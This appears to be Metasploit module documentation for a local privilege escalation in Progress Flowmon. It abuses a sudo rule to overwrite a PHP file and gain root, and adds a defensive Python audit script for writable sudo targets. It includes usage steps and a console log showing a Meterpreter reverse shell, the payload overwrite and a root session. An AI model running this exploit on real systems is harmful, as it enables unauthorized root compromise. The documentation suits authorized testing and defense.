This adds a local privesc exploit module which abuses the sudoers permissions for the Flowmon user to elevate to root.
Vulnerable Application
Progress Flowmon up to at least version 12.3.2 is vulnerable to local privilege escalation from the flowmon user to root. This is possible because the flowmon user is able to run several commands with sudo. This module exploits the ability to overwrite a PHP file and execute it with sudo, granting full sudo permissions to the flowmon user and elevating the shell to a root shell.
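The weakness described above is a sudo rule whose target the unprivileged user can rewrite. The audit script below is an added example, not part of the module or the original page: it parses sudoers-style rules for a given user and flags any command spec in which the binary or an absolute-path argument (or its parent directory) is writable by that user. The SAMPLE_SUDOERS fragment is constructed for the example and is not the real Flowmon sudoers file; the rule naming /var/www/shtml/index.php is hypothetical and only mirrors the shape of the problem the page describes.

```python
import os
import re
import shlex
from dataclasses import dataclass, field
from typing import Callable, List

# Constructed sudoers fragment for this example. It is NOT taken from any
# appliance; it only reproduces the shape of the weakness: an unprivileged
# user may run an interpreter as root on a script that user can overwrite.
SAMPLE_SUDOERS = """\
# constructed example, not taken from any real system
Defaults    env_reset
flowmon ALL=(root) NOPASSWD: /usr/bin/php /var/www/shtml/index.php
flowmon ALL=(root) NOPASSWD: /usr/sbin/service httpd restart, /bin/systemctl status httpd
backup  ALL=(ALL) /usr/bin/rsync
%admins ALL=(ALL) ALL
"""

# Tags that may precede a command in a sudoers Cmnd_Spec.
SUDO_TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
             "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
             "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW", "INTERCEPT", "NOINTERCEPT"}

# user  hosts = (runas) [TAG: ...] cmd [args], cmd [args]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    writable_paths: List[str] = field(default_factory=list)


def _strip_tags(spec: str) -> str:
    """Drop leading NOPASSWD:/SETENV:-style tags from one command spec."""
    tokens = spec.strip().split()
    while tokens and tokens[0].endswith(":") and tokens[0][:-1].upper() in SUDO_TAGS:
        tokens.pop(0)
    return " ".join(tokens)


def find_writable_sudo_targets(
        sudoers_text: str, user: str,
        is_writable: Callable[[str], bool] = lambda p: os.access(p, os.W_OK)) -> List[Finding]:
    """Return the sudo rules for `user` whose binary or absolute-path argument
    the user could replace (the path itself or its parent directory is
    writable). Only rules naming the user literally are matched; %group and
    alias rules are left for the caller to expand. `is_writable` defaults to
    os.access for the current real uid, so run as the user under review."""
    findings: List[Finding] = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m or m.group("user") != user:
            continue
        runas = m.group("runas") or "root"
        for spec in m.group("cmds").split(","):
            spec = _strip_tags(spec)
            if not spec or spec.upper() == "ALL":
                continue
            try:
                argv = shlex.split(spec)
            except ValueError:
                continue  # unbalanced quotes: not a parseable command spec
            replaceable = [p for p in argv if p.startswith("/")
                           and (is_writable(p) or is_writable(os.path.dirname(p)))]
            if replaceable:
                findings.append(Finding(user, runas, argv[0], replaceable))
    return findings


if __name__ == "__main__":
    # Offline demo: stand in for os.access with a constructed answer so the
    # script runs without the sample paths existing on this machine.
    demo_writable = lambda p: p == "/var/www/shtml/index.php"
    for f in find_writable_sudo_targets(SAMPLE_SUDOERS, "flowmon", demo_writable):
        print(f"{f.user} may run {f.command} as {f.runas}; "
              f"user-replaceable path(s): {', '.join(f.writable_paths)}")
```

On a live host, export the rule set as root (`/etc/sudoers` plus `/etc/sudoers.d/*`) and run the check as the account being reviewed so that `os.access` reflects that account's permissions. Any finding is remediated by either dropping the rule or making the script and its directory root-owned and not writable by the invoking user; a writable parent directory is flagged as well, because it allows the file to be swapped out even when the file itself is read-only.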
Verification Steps
Gain a session on a Progress Kemp Loadmaster target as the flowmon user
Do: use exploits/linux/local/progress_flowmon_sudo_privesc
Do: set SESSION <session>
Do: set LHOST <your host IP>
Do: run
You should get a shell as the root user.
Scenarios
Flowmon 12.2
Active sessions
===============
Id  Name  Type                  Information                                                  Connection
--  ----  ----                  -----------                                                  ----------
2         meterpreter x64/linux flowmon @ flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net  138.111.211.11:4444 -> 172.174.209.101:50756 (10.1.0.4)
msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > show options
Module options (exploit/linux/local/progress_flowmon_sudo_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 2 yes The session to run this module on
TEMP_PAYLOAD /tmp/sCmGZ yes The temporary name to use to store the payload.
Payload options (linux/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 138.111.211.11 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > run
[*] Started reverse TCP handler on 138.111.211.11:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Copying /var/www/shtml/index.php to /tmp/index.php.bak
[*] Overwriting /var/www/shtml/index.php with payload
[*] Executing sudo to elevate privileges
[*] Replacing index.php with original file
[+] Deleted /tmp/sCmGZ
[*] Meterpreter session 3 opened (138.111.211.11:4444 -> 172.174.209.101:51042) at 2024-05-01 15:41:10 +0000
meterpreter > sysinfo
Computer : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
For more details on the vulnerability:
https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ (privesc methods)
https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
This application is available in cloud marketplaces: